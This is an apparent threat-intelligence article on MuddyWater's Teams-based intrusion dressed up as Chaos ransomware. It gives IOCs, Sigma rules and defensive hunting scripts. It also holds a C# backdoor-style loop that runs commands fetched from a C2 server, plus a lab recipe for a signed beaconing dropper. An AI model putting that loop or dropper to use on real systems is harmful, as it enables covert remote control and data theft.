MuddyWater’s Chaos Ransomware Masquerade: Dissecting the Iranian APT’s Teams-Based Intrusion Chain, Credential Harvesting, and False-Flag Deployment

A ransom note landed. A leak site countdown started ticking. Extortion emails fanned out across the org. Every signal screamed “ransomware crew,” and that was exactly the point. When Rapid7 pulled the incident apart in early 2026, the one thing that should have been there, encrypted files, was missing. What looked like a Chaos affiliate cashing out was MuddyWater, an Iranian intelligence operation, wearing a criminal costume so the IR team would chase the wrong ghost.


Why the costume matters more than the malware

Start with the conclusion, because it reframes everything else: the ransomware was theater. Rapid7’s assessment is blunt about it. “The inclusion of extortion and negotiation elements likely aimed to focus response teams on the immediate impact, delaying detection of persistence mechanisms implanted through remote access tools.” Translation: the crime story was a distraction layer bolted on top of an espionage operation, designed to burn your analysts’ first 48 hours on a negotiation that was never real.

This is a defender problem before it is a malware problem. If your triage playbook says “ransomware listing plus extortion email equals financially motivated crime, contain and negotiate,” then a nation-state actor just programmed your response. They know how SOCs think. They know the moment a Chaos logo shows up on a Tor leak site, half the room pivots to ransom posture, legal gets looped in, and nobody is asking why a renamed pythonw.exe is talking to an IP in the Hetzner range. That gap, the one between “we think we know what this is” and “we actually traced the kill chain,” is the entire operational value of the false flag.

So the way to read this campaign is backwards from the tell. The tell is the absence of encryption. Everything upstream of that, the Teams lure, the credential capture, the signed dropper, the trojanized WebView2 binary, exists to harvest credentials and exfiltrate data while the downstream noise keeps you looking the other way.

Who MuddyWater actually is

MuddyWater goes by a zoo of names depending on which vendor’s taxonomy you read: Mango Sandstorm (Microsoft), Mercury, Seedworm (Symantec), Static Kitten. The US government has linked the group directly to Iran’s Ministry of Intelligence and Security. CISA’s language is unusually direct, describing Seedworm as “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” This is not a loose affiliation or a contractor relationship of convenience. It is a state intelligence apparatus.

Active since 2017, the group cut its teeth on Middle Eastern targets and then widened the aperture to telecommunications, defense, local government, and oil and gas across Asia, Africa, Europe, and North America. They operate exclusively against Windows. Their early reputation was built on fileless, PowerShell-driven intrusions engineered to leave as little on disk as possible. That heritage matters, because the 2026 campaign is what happens when a fileless-first APT decides it wants the loud, attention-grabbing cover of a ransomware brand without abandoning its quiet tradecraft underneath.

The timing is geopolitical. Through 2026, against a backdrop of US, Israel, and Iran tension, MuddyWater’s operational tempo climbed: intrusions touched a US bank, an airport, and software companies. False-flag activity is a strategic response to that exposure. When your operations keep getting attributed back to MOIS, you change the costume.

Chaos: the brand they borrowed

To understand the masquerade you have to understand the mask. Chaos is a real ransomware-as-a-service operation, not a MuddyWater invention. It emerged in February 2025 in the wake of Operation Checkmate, the law enforcement action that disrupted BlackSuit’s infrastructure. Chaos filled some of that vacuum.

Its data leak site has a signature mechanic worth knowing: a “blind” countdown timer that withholds the victim’s identity until the clock runs out. The design intent is psychological, accelerating negotiations by keeping the victim guessing whether their name is about to go public. Chaos also runs a layered extortion model:

Extortion tier   Mechanism
---------------  --------------------------------------------------------------------------------------
Single           Encrypt files, demand payment for decryption
Double           Exfiltrate data, threaten public leak
Triple           Add DDoS threats against victim infrastructure, offered as a bundled affiliate service
Quadruple        Threaten to contact the victim’s customers or competitors to escalate pressure

This is a sophisticated, multi-pressure criminal brand, which is precisely why it makes good cover. A defender who pulls up Chaos’s profile sees a credible financially motivated operation with documented TTPs. The brand does the legitimacy work for the attacker. Rapid7 noted that MuddyWater had deployed Qilin ransomware in a late 2025 attack on an Israeli organization and assessed that the group may have shifted to Chaos branding after that Qilin operation got tied back to MOIS. The mask is disposable. When one gets burned, they pick up another.

Stage one: the Teams lure and the IT support persona

The intrusion did not begin with an exploit or a malicious attachment. It began with a chat request.

MuddyWater initiated contact through Microsoft Teams external messaging, engaging employees directly. This is the abuse of a legitimate, federated collaboration feature. By default, many Teams tenants permit external organizations to initiate chats, and the AllowExternalAccess setting in the Teams admin center governs exactly this. When it is open, a threat actor with any Microsoft tenant can message your staff as if they were a trusted contact.

The persona is the part MuddyWater has sharpened all year: “IT Support.” The interactive Teams sessions used to harvest credentials and MFA align closely with the IT-help-desk identity the group refined throughout 2026. A user gets a message from “IT,” there is a problem with their account, can they hop on a quick screen share. The whole thing runs on the social momentum of someone who believes they are talking to their own help desk.

Once on a screen-sharing session, the actor ran basic discovery, accessed files tied to the victim’s VPN configuration, and walked users through entering credentials into locally created text files. Two distinct credential-capture vectors showed up:

  1. The plaintext file path. Employees were convinced to type their passwords into a text file on their own machine. The attacker, watching the screen share, simply reads the credentials off the screen. No malware, no phishing infrastructure, no network artifact to catch. Just a human typing a secret while a stranger watches.

  2. The fake Quick Assist portal. Victims were directed to phishing pages masquerading as Microsoft Quick Assist. The domain adm-pulse[.]com served as a fake Quick Assist login portal. Quick Assist is Microsoft’s legitimate remote-help tool, so the brand impersonation slots neatly into the IT-support cover story.

Then comes the move that turns a credential into durable access: MFA manipulation. Some employees were walked through adding an attacker-controlled device to their multi-factor authentication settings. This is the quiet catastrophe. A stolen password expires the next time the user resets it. An attacker-enrolled MFA device gives the adversary an enduring, self-service path back into the account that survives password rotation and looks, to the authentication system, like a perfectly legitimate second factor.

By operating interactively through compromised users, the attacker performed initial discovery, harvested credentials, manipulated MFA, and transitioned to using legitimate accounts for internal access. Notice that no exploit has fired yet. The “vulnerability” being exploited is the trust relationship between an employee and a voice claiming to be IT.

[Figure: flowchart of the Teams-based intrusion chain, from external chat through screen sharing, plaintext credential capture, fake Quick Assist phishing and attacker MFA device enrollment to persistent account access]
MuddyWater’s entire initial-access chain runs on social trust – no exploit fires until a real account with a real second factor is already in the attacker’s hands.

Stage two: legitimate tools, real accounts, internal access

With valid credentials and MFA control, the operation moved inside. Attackers authenticated to internal systems including a domain controller and established persistence using RDP, DWAgent, and AnyDesk.

This is the hardest phase to detect and it is hard on purpose. There is no malicious binary in a logon to a DC with a real username and a real second factor. RDP is a built-in admin protocol. DWAgent and AnyDesk are commercial remote-management tools used by legitimate IT departments every day. The following executables showed up in the environment:

Binary        Tool      Role
------------  --------  -----------------------
dwagent.exe   DWAgent   Primary agent
dwagsvc.exe   DWAgent   Service component
dwaglnc.exe   DWAgent   Launcher
AnyDesk.exe   AnyDesk   Secondary remote access

The strategic logic of “living off legitimate tools” is that every one of these has a benign explanation. An EDR that alerts on AnyDesk will drown your SOC in false positives because half your help desk runs it. The attacker is hiding inside the noise floor of normal IT operations. Their persistence is not a rootkit, it is a vendor-signed remote support agent that your change-management process probably has no record of, because nobody checked change management before assuming it was sanctioned.

From there, the access was used to deploy additional payloads, move laterally, and harvest and exfiltrate data. The DC compromise is the prize. Domain controller access means the keys to the directory, which means every credential, every group membership, every trust path in the environment.

Stage three: Stagecomp, the signed dropper

Now the malware chain starts, and even here MuddyWater keeps it minimal. The first-stage downloader, internally tracked as Stagecomp, arrived as ms_upd.exe. It was installed via a simple curl command and reached out to its command-and-control domain moonzonet[.]com.

Stagecomp’s job is small and disciplined: collect system information and pull down the next stage. From the C2 it dropped three components:

File                 Purpose
-------------------  ------------------------------------------------
game.exe             The Darkcomp backdoor (second stage)
WebView2Loader.dll   Legitimate Microsoft DLL for side-loading cover
visualwincomp.txt    Encrypted configuration holding C2 details

The attribution gold is in the signature. ms_upd.exe was signed using a code-signing certificate under the name “Donald Gay.” That same identity has previously signed MuddyWater’s Stagecomp downloader. Per threat intelligence from March and April 2026, the certificate ties directly to MuddyWater’s “Operation Olalampo,” a campaign hitting organizations across the US and MENA. The “Donald Gay” certificate also clusters with an “Amy Cherne” certificate, and together they sign the same body of MuddyWater-attributed tooling.

Here is the practical lesson on code signing. A valid Authenticode signature does not mean trusted, it means signed. Naive allowlisting that trusts “anything signed” gets walked straight past by an attacker who simply obtained or abused a certificate. The signature’s real value to a defender is the opposite of what the attacker intended: it is a high-fidelity attribution anchor. The “Donald Gay” cert is a fingerprint linking this 2026 Chaos masquerade back through Operation Olalampo to the Fakeset and Stagecomp lineage. The thing meant to make the malware look legitimate is the thing that names the author.

In the lab, you can reproduce the deception mechanics safely. Build a minimal dropper in C# that grabs hostname, username, and OS version, beacons to a Python HTTP listener standing in for moonzonet[.]com, and writes out three files. Then sign it with a self-signed Authenticode cert via signtool.exe and watch how a signature-only check waves it through while the actual certificate chain refuses to validate. That gap is where the “Donald Gay” trick lives.

[Figure: flow diagram of the Stagecomp dropper pulling three components from the moonzonet C2 (the Darkcomp RAT, a legitimate WebView2 side-load DLL and an encrypted config), then Darkcomp beaconing to the uploadfiler C2]
Stagecomp’s sole job is to fetch and stage three files; all operational capability lives in Darkcomp, whose C2 address is hidden inside an encrypted config rather than any static string.

Stage four: Darkcomp, the trojanized WebView2 backdoor

The payload, game.exe, is a bespoke RAT tracked as Darkcomp, and its disguise is genuinely clever. It is a trojanized version of Microsoft’s official WebView2APISample project. WebView2 is Microsoft’s embedded-browser control, shipped and used legitimately across countless Windows apps. By starting from the real sample project, the attacker inherits authentic version metadata, a believable file description, and a plausible reason for WebView2Loader.dll to sit next to it.

That neighboring DLL is the side-loading cover. When WebView2APISample.exe loads a real WebView2Loader.dll, the process looks, to a casual AV scan, like an ordinary WebView2 application. The legitimate DLL launders the binary’s appearance.

Darkcomp’s execution flow is patient and quiet:

  1. Anti-analysis and anti-VM checks first. Before it touches the network, it runs environment checks designed to detect sandboxes and analysis VMs. In a lab analog you would mirror these with CPUID hypervisor-bit inspection and RDTSC timing deltas, the classic tells that the code is running under emulation or a debugger.
  2. Decrypt the config. It reads visualwincomp.txt, an encrypted configuration file, to obtain its C2 address. Storing the C2 in an encrypted external config rather than hardcoding it keeps the destination out of plain static strings and lets the operators rotate infrastructure without rebuilding the binary.
  3. Beacon and poll. It sends victim host information to the C2 at uploadfiler[.]com over port 443, then polls the server for commands every 60 seconds, indefinitely.
  4. Execute on command. It supports 12 commands, covering execution via cmd.exe or PowerShell, writing base64-encoded files to disk, deleting files, and starting and stopping interactive shells.

A second sample seen in the wild (SHA256 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90) implements the identical logic but masquerades as WebView2.exe instead of Game.exe. Same engine, different name on the badge.

Conceptually the poll loop is unremarkable, and that is the point. Here is the shape of it, illustrative only:

// Darkcomp-analog poll loop (lab illustration, not the real sample)
string c2 = DecryptConfig("visualwincomp.txt");   // XOR/AES with embedded key
SendBeacon(c2, CollectHostInfo());                  // hostname, user, OS
while (true)
{
    var cmd = HttpGet($"https://{c2}/poll");        // 60s interval
    if (cmd?.type == "exec")
    {
        var output = RunHidden("cmd.exe", "/c " + cmd.payload);
        HttpPost($"https://{c2}/result", output);
    }
    else if (cmd?.type == "write")
        File.WriteAllBytes(cmd.path, Convert.FromBase64String(cmd.data));
    Thread.Sleep(60000);
}

Nothing about that is exotic. The sophistication is not in the RAT’s cleverness, it is in the layers of legitimacy wrapped around it: a real sample project, a real DLL, a valid signature on the dropper, and a 60-second cadence that blends into normal HTTPS traffic.

Stage five: the pythonw.exe injection signature

One artifact ties this campaign to MuddyWater’s deeper tradecraft regardless of which ransomware brand is on top: the group’s signature use of a renamed pythonw.exe to inject code into suspended processes. In this intrusion, a renamed pythonw.exe reached out to 116.203.208[.]186.

Why pythonw.exe? It is the windowless variant of the Python interpreter: no console window appears when it runs. Renamed and dropped on a host, it provides a flexible, scriptable execution engine that does not carry the same suspicion as a fresh unknown binary, while the injection into a suspended process provides memory-resident execution with a minimal disk footprint. This is the fileless DNA from the group’s 2017-era operations, still beating under the 2026 ransomware costume.

For a defender, this is the consistency that survives the masquerade. Brands change. Ransomware logos change. The renamed-pythonw.exe-into-suspended-process technique persists across campaigns, which makes it one of the most reliable behavioral fingerprints you can hunt for.

The endgame: extortion that was always fake

With data exfiltrated and persistence seeded, MuddyWater executed the cover story. They sent emails to multiple users threatening to leak stolen information unless a ransom was paid, and directed the victim to the Chaos leak site with its Tor negotiation address hptqq2o2qjva7lcaaq67w36jihzivkaitkexorauw7b2yul2z6zozpqd[.]onion.

Then the tell, the detail that unravels the whole performance. A follow-up email told recipients to find a “note” containing credentials for a secure chat to continue negotiations. The note was never found. The stolen data was simply leaked online. There was no real negotiation channel because there was never a real intent to negotiate. And crucially, despite all the Chaos artifacts, no files were encrypted.

Rapid7’s framing is the load-bearing insight: “the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component functioned primarily as a facilitating or obfuscation mechanism, rather than as the primary objective of the intrusion.”

A real Chaos affiliate’s economic model depends on encryption, that is the leverage that makes victims pay. An espionage operation does not want to encrypt anything, because encryption is destructive, noisy, and counterproductive when your goal is quiet, sustained collection. The missing crypto is the seam where the costume doesn’t quite fit.

[Figure: a ransomware countdown timer drawn as a cracked facade with a surveillance eye behind it]
The Chaos countdown and extortion emails were never meant to convert – they existed to consume IR resources while MuddyWater’s persistence and exfiltration went uncontested.

Reading the attribution

No single artifact proves MuddyWater. The case is built by correlation, and it is worth seeing how the pieces stack to a confident judgment:

Anchor                          What it shows
------------------------------  --------------------------------------------------------------------------------------------------------------------
“Donald Gay” signing cert       Continuity with Stagecomp, Fakeset, and Operation Olalampo tooling, clustered with the “Amy Cherne” cert over the same toolset
moonzonet[.]com C2              Tied to MuddyWater in early 2026 activity against Israeli and Western targets
uploadfiler[.]com C2            Darkcomp command-and-control, part of the same staged infrastructure
Renamed pythonw.exe injection   Long-standing MuddyWater tradecraft signature
Teams IT-support persona        Matches the social-engineering identity MuddyWater refined through 2026
Missing encryption              Behavioral inconsistency with genuine Chaos operations

Any one of these alone is suggestive. Together they form a chain where the certificate lineage, the infrastructure overlap, the injection technique, and the persona all point at the same actor, while the false-flag behavior explains why it was dressed up as something else. That is how you reach a defensible attribution judgment without a confession.

[Figure: attribution graph with MuddyWater as the central node, connected to the Donald Gay and Amy Cherne signing certificates, the moonzonet and uploadfiler C2 infrastructure, the renamed pythonw.exe injection technique and Operation Olalampo]
No single indicator names MuddyWater – the attribution is built from certificate lineage, infrastructure overlap, and a behavioral TTP fingerprint that has persisted across every ransomware costume the group has worn.

Detection and defense: seeing through the mask

The job here is not just to detect malware, it is to detect the espionage operation underneath a convincing crime story. Map your telemetry to the kill chain and the cover stops working.

Telemetry mapped to the chain

Phase                Primary signals
-------------------  ------------------------------------------------------------------------------------------------------------------------
Teams lure           M365 Unified Audit Log ChatMessageReceived with CommunicationType: External
Credential capture   Sysmon ID 11 (FileCreate for creds.txt-style files), ID 3 (browser to adm-pulse[.]com)
MFA abuse            Entra ID AuthenticationMethodsUpdated events, off-hours or new-IP enrollments
Stagecomp delivery   Event ID 4688 / Sysmon ID 1 (curl.exe fetching ms_upd.exe), Sysmon ID 22 (DNS to moonzonet[.]com)
Darkcomp             Sysmon ID 3 (Game.exe/WebView2APISample.exe to uploadfiler[.]com:443), Sysmon ID 7 (WebView2Loader.dll loaded by unexpected process)
Injection            Sysmon ID 8 (CreateRemoteThread from pythonw.exe), ID 25 (ProcessTampering)
Lateral movement     4624 Logon Type 10 (RDP), 4648 explicit credentials, 4776 NTLM validation on DC
Persistence          7045 new service (DWAgent/dwagsvc), Sysmon ID 13 (RMT service registry keys)

ETW providers worth wiring up

  • Microsoft-Windows-PowerShell/Operational (GUID A0C1853B-5C40-4B15-8766-3CF1C58F985A) with ScriptBlock logging to catch the encoded PowerShell Darkcomp dispatches.
  • Microsoft-Windows-Threat-Intelligence for process-injection visibility via PsSetCreateProcessNotifyRoutine, the pythonw.exe tradecraft.
  • Microsoft-Windows-DNS-Client/Operational for C2 domain resolution.
  • Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational for RDP session establishment to the DC.

Detection logic that targets the actual TTPs

A Sigma rule for the trojanized WebView2 binary talking to the internet cuts straight at Darkcomp:

title: WebView2APISample Suspicious Outbound Connection
status: experimental
description: Darkcomp (trojanized WebView2APISample seen as Game.exe, WebView2APISample.exe or WebView2.exe) initiating an outbound connection to a non-private address
logsource:
  product: windows
  category: network_connection
detection:
  selection:
    Image|endswith:
      - '\Game.exe'
      - '\WebView2APISample.exe'
      - '\WebView2.exe'
    Initiated: 'true'
  filter_legitimate:
    # full RFC 1918 ranges; a bare '172.16.' prefix would only cover 172.16.0.0/16 and miss 172.17-172.31
    DestinationIp|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection and not filter_legitimate
level: critical
tags:
  - attack.command_and_control
  - attack.t1071.001

The renamed-interpreter injection is one of the highest-signal hunts you can run:

title: pythonw.exe CreateRemoteThread into Process
status: experimental
logsource:
  product: windows
  category: create_remote_thread
detection:
  selection:
    SourceImage|endswith: '\pythonw.exe'
  condition: selection
level: critical
tags:
  - attack.defense_evasion
  - attack.t1055

And the correlation that catches the social-engineering-to-persistence pivot: a remote-management tool service (DWAgent, AnyDesk, dwagsvc) installed within roughly an hour of an external Teams message, cross-referenced against change-management records. If IT did not schedule it, it is not IT.
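The correlation just described, together with the Stage one signals it depends on (external Teams chat, attacker MFA enrollment, remote-management tool install), as an added example that is not Rapid7's code and was not recovered from the incident: a Python hunt that joins external Teams chats to new MFA methods and remote-management service installs for the same user inside a one-hour window, then drops anything a change ticket covers. The event dictionaries are constructed, simplified stand-ins for the Unified Audit Log, the Entra ID audit log and Event ID 7045; field names such as CommunicationType, the AuthenticationMethodsUpdated operation and the UPN-resolved User on the 7045 record are assumptions about a normalised feed, not vendor schemas.

```python
"""Kill-chain correlator: external Teams chat -> MFA enrollment / RMT service install.

Added example for this article, not Rapid7's code and not anything recovered
from the incident. Event shapes are constructed, simplified stand-ins for the
M365 Unified Audit Log, the Entra ID audit log and Windows Event ID 7045; the
field names are assumptions about a normalised feed, not vendor schemas.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)
# Remote-management tools seen in the intrusion, matched case-insensitively on the service name
RMT_SERVICE_NAMES = ("dwagent", "dwagsvc", "anydesk")


def parse_ts(value):
    """ISO-8601 timestamp with a trailing Z -> timezone-aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def external_chat_times(events):
    """Map user -> sorted times at which someone outside the tenant started a Teams chat."""
    chats = {}
    for e in events:
        if e.get("Operation") == "ChatMessageReceived" and e.get("CommunicationType") == "External":
            chats.setdefault(e["UserId"].lower(), []).append(parse_ts(e["CreationTime"]))
    for times in chats.values():
        times.sort()
    return chats


def follow_on_events(events):
    """Yield (user, time, description) for the two persistence signals that matter here."""
    for e in events:
        if e.get("Operation") == "AuthenticationMethodsUpdated":          # Entra: new MFA method
            yield (e["UserId"].lower(), parse_ts(e["CreationTime"]),
                   f"new MFA method from {e.get('ClientIP', '?')}")
        elif e.get("EventID") == 7045:                                     # System log: service installed
            name = e.get("ServiceName", "").lower()
            if any(tag in name for tag in RMT_SERVICE_NAMES):
                # 'User' is assumed to be the installing account already resolved to a UPN
                yield (e["User"].lower(), parse_ts(e["TimeCreated"]),
                       f"service {e['ServiceName']} installed on {e.get('Computer', '?')}")


def covered_by_change(user, when, tickets):
    """True if a change-management ticket for this user covers the moment of the event."""
    return any(t["user"].lower() == user and parse_ts(t["start"]) <= when <= parse_ts(t["end"])
               for t in tickets)


def correlate(events, tickets):
    """Alert when a persistence signal lands within WINDOW after an external chat to the same user
    and no change ticket explains it. Returns a list of human-readable alert lines."""
    chats = external_chat_times(events)
    alerts = []
    for user, when, what in follow_on_events(events):
        prior = [t for t in chats.get(user, []) if timedelta(0) <= when - t <= WINDOW]
        if prior and not covered_by_change(user, when, tickets):
            minutes = int((when - prior[-1]).total_seconds() // 60)
            alerts.append(f"{user}: {what}, {minutes} min after external Teams chat, no change ticket")
    return alerts


# Constructed sample telemetry (not real logs): one intrusion-shaped sequence, one ticketed
# AnyDesk rollout, and one RMT install that falls outside the window.
SAMPLE_EVENTS = [
    {"Operation": "ChatMessageReceived", "CommunicationType": "External",
     "UserId": "jdoe@corp.example", "CreationTime": "2026-03-02T09:02:00Z"},
    {"Operation": "AuthenticationMethodsUpdated", "UserId": "jdoe@corp.example",
     "CreationTime": "2026-03-02T09:31:00Z", "ClientIP": "203.0.113.77"},
    {"EventID": 7045, "ServiceName": "DWAgent", "User": "jdoe@corp.example",
     "Computer": "WS-1042", "TimeCreated": "2026-03-02T09:40:00Z"},
    {"Operation": "ChatMessageReceived", "CommunicationType": "External",
     "UserId": "asmith@corp.example", "CreationTime": "2026-03-02T10:00:00Z"},
    {"EventID": 7045, "ServiceName": "AnyDesk", "User": "asmith@corp.example",
     "Computer": "WS-2210", "TimeCreated": "2026-03-02T10:20:00Z"},
    {"Operation": "ChatMessageReceived", "CommunicationType": "External",
     "UserId": "bwong@corp.example", "CreationTime": "2026-03-02T11:00:00Z"},
    {"EventID": 7045, "ServiceName": "dwagsvc", "User": "bwong@corp.example",
     "Computer": "WS-0310", "TimeCreated": "2026-03-02T14:15:00Z"},
]
# Constructed change ticket covering asmith's scheduled AnyDesk rollout
SAMPLE_TICKETS = [
    {"user": "asmith@corp.example", "start": "2026-03-02T10:00:00Z", "end": "2026-03-02T11:00:00Z"},
]

if __name__ == "__main__":
    for line in correlate(SAMPLE_EVENTS, SAMPLE_TICKETS):
        print(line)
```

Run as a script it prints the two jdoe alerts (MFA method added 29 minutes after the external chat, DWAgent service 38 minutes after); asmith's AnyDesk install is explained by the ticket and bwong's dwagsvc install falls three hours outside the window. In practice feed correlate() the normalised events from your SIEM and the ticket export from change management, and tighten WINDOW once you have measured how long a legitimate help-desk session runs in your environment.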

Hardening that closes the front door

The detections above catch the operation in progress. These controls deny it the entry it relied on:

  1. Lock down Teams external access. Set ExternalAccessPolicy to explicitly allowlist known partner tenants and disable external chat for non-executive roles. This single change kills the initial-access vector.
  2. Gate MFA enrollment. Use Entra ID Conditional Access and Authentication Strength to require a Temporary Access Pass, a compliant device, or manager approval for any new authenticator enrollment. Alert on every AuthenticationMethodsUpdated event. Attacker-enrolled MFA is the persistence that survives a password reset.
  3. Allowlist remote-management tools. Use AppLocker or WDAC to block DWAgent, AnyDesk, and Quick Assist except for sanctioned IT change. RMT abuse is the persistence layer the false flag was meant to hide.
  4. Protect VPN config files. Apply tight NTFS ACLs and audit read access (Event ID 4663) on VPN configuration directories, exactly the files the actor went after during screen shares.
  5. Treat signed as a clue, not a pass. Enforce WDAC with proper certificate-chain validation rather than signature-only trust. A “Donald Gay” certificate should be a detection, not a green light.

The triage rule that defeats the masquerade

When a ransomware listing appears, do not let the leak site set your posture. Ask the question that unravels the costume: is anything actually encrypted? If the Chaos artifacts are present but no files are locked, you are very likely looking at an espionage operation using ransomware as cover. Pivot immediately from negotiation posture to a full hunt for persistence, credential theft, and exfiltration. The extortion email is bait designed to consume your first 48 hours. Spend them on the kill chain instead.
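The "is anything actually encrypted?" check, as an added example that is not part of the original article or of any vendor tooling: a Python survey that walks a directory tree, judges each file on the Shannon entropy of its first 4 KiB and on whether its magic bytes match its extension, and reports what fraction of files look like ciphertext. The two sample trees it builds (a masquerade with a ransom-note-style file beside intact documents, and a genuinely encrypted tree) are constructed, the magic-byte table is a minimal one, and the 7.5 bits/byte and 50 % thresholds are assumptions to tune against your own file shares.

```python
"""Encryption triage: is anything on this host actually encrypted?

Added example for this article, not from Rapid7 or any vendor tool. Judges
files on the Shannon entropy of their first 4 KiB and on whether their magic
bytes match their extension; the sample trees are constructed and the
thresholds are assumptions to tune against real file shares.
"""
import math
import os
import tempfile
from collections import Counter

SAMPLE_BYTES = 4096
HIGH_ENTROPY = 7.5   # bits per byte; ciphertext and compressed data sit near 8.0 (assumed threshold)
# Minimal magic-byte table for the document types in the constructed sample
MAGIC = {
    ".pdf": b"%PDF",
    ".docx": b"PK\x03\x04",
    ".xlsx": b"PK\x03\x04",
    ".png": b"\x89PNG",
}


def shannon_entropy(data):
    """Entropy in bits per byte of a byte string (0.0 for empty or single-valued input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(path):
    """Return 'plain', 'suspicious' or 'encrypted' for one file."""
    with open(path, "rb") as f:
        head = f.read(SAMPLE_BYTES)
    expected = MAGIC.get(os.path.splitext(path)[1].lower())
    dense = shannon_entropy(head) >= HIGH_ENTROPY
    if expected is not None:
        if head.startswith(expected):
            return "plain"                                # header matches the claimed type; zip-based formats are dense by design
        return "encrypted" if dense else "suspicious"     # claims to be a PDF/Office file but the header is gone
    return "encrypted" if dense else "plain"              # unknown or renamed extension: judge on entropy alone


def survey(root):
    """Walk a tree; return (Counter of verdicts, list of paths judged encrypted)."""
    counts, hits = Counter(), []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            verdict = classify(path)
            counts[verdict] += 1
            if verdict == "encrypted":
                hits.append(path)
    return counts, hits


def looks_like_real_ransomware(counts, threshold=0.5):
    """Genuine ransomware turns most user data into ciphertext; a few dense files do not count."""
    total = sum(counts.values())
    return total > 0 and counts.get("encrypted", 0) / total >= threshold


def build_sample(root, files_encrypted):
    """Constructed sample tree: three documents plus a ransom-note-style file. With
    files_encrypted=True the documents become random bytes (standing in for ciphertext)
    and one of them also gets a new extension, as an encryptor would leave them."""
    os.makedirs(root, exist_ok=True)
    docs = {
        "q1_report.txt": b"Quarterly figures were in line with forecast.\n" * 40,
        "contract.pdf": b"%PDF-1.7\n" + b"1 0 obj << /Type /Catalog >> endobj\n" * 60,
        "budget.xlsx": b"PK\x03\x04" + b"[Content_Types].xml" * 50,
    }
    for name, body in docs.items():
        if files_encrypted:
            body = os.urandom(8192)
            if name == "budget.xlsx":
                name += ".locked"
        with open(os.path.join(root, name), "wb") as f:
            f.write(body)
    with open(os.path.join(root, "READ_ME.txt"), "wb") as f:   # the note is present in both trees
        f.write(b"Your files have been encrypted. Visit the leak site.\n" * 10)


def run_demo():
    """Survey a masquerade tree (note, intact documents) and a genuinely encrypted tree."""
    results = {}
    for label, encrypted in (("masquerade", False), ("real", True)):
        root = tempfile.mkdtemp(prefix=f"triage-{label}-")
        build_sample(root, encrypted)
        counts, _ = survey(root)
        results[label] = (dict(counts), looks_like_real_ransomware(counts))
    return results


if __name__ == "__main__":
    for label, (counts, verdict) in run_demo().items():
        print(f"{label}: {counts} -> real ransomware? {verdict}")
```

Point survey() at a user share or a sample of home directories rather than the whole disk, and read the result as a fraction: a few dense files (archives, media, existing encrypted containers) are normal, a majority of user documents turning into headerless high-entropy blobs is not. A ransom note sitting beside intact documents is the pattern this article describes, and it is the cue to pivot from negotiation posture to the persistence hunt.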

This is not a one-off. MuddyWater’s trajectory through ransomware brands tells the whole story: PowGoop-delivered Thanos with destructive intent in 2020, the DarkBit persona with DEV-1084 in 2023, Qilin in late 2025, and now Chaos in 2026. Each time, criminal branding provides attribution confusion, deters victim reporting, and misdirects IR resources. MuddyWater is not alone in this, the convergence of state actors with the criminal MaaS ecosystem is a defining pattern of the current threat landscape. The ransomware brand is increasingly a disposable wrapper around a state objective.

Key takeaways

  • The missing encryption is the tell. Genuine ransomware encrypts because that is the leverage. Chaos artifacts with no encrypted files means you are probably looking at espionage wearing a crime costume.
  • The lure is a Teams chat, not an exploit. MuddyWater’s initial access ran on an IT-support persona over external Teams messaging. Lock down AllowExternalAccess and you close the front door.
  • MFA enrollment abuse is the real persistence. A stolen password expires. An attacker-enrolled authenticator survives password resets and looks legitimate. Gate enrollment and alert on every AuthenticationMethodsUpdated.
  • “Signed” is an attribution clue, not a trust verdict. The “Donald Gay” certificate did not make the malware safe, it named the author. Validate full certificate chains, never trust on signature presence alone.
  • Hunt the tradecraft that outlives the brand. Renamed pythonw.exe injecting into suspended processes is MuddyWater’s fingerprint across every ransomware costume they have worn. That behavior, not the logo on the leak site, is what you detect.
  • Rewrite your ransomware triage. When a leak site appears, ask “is anything encrypted” before you assume crime. The extortion narrative exists to burn your first 48 hours. Spend them hunting persistence.
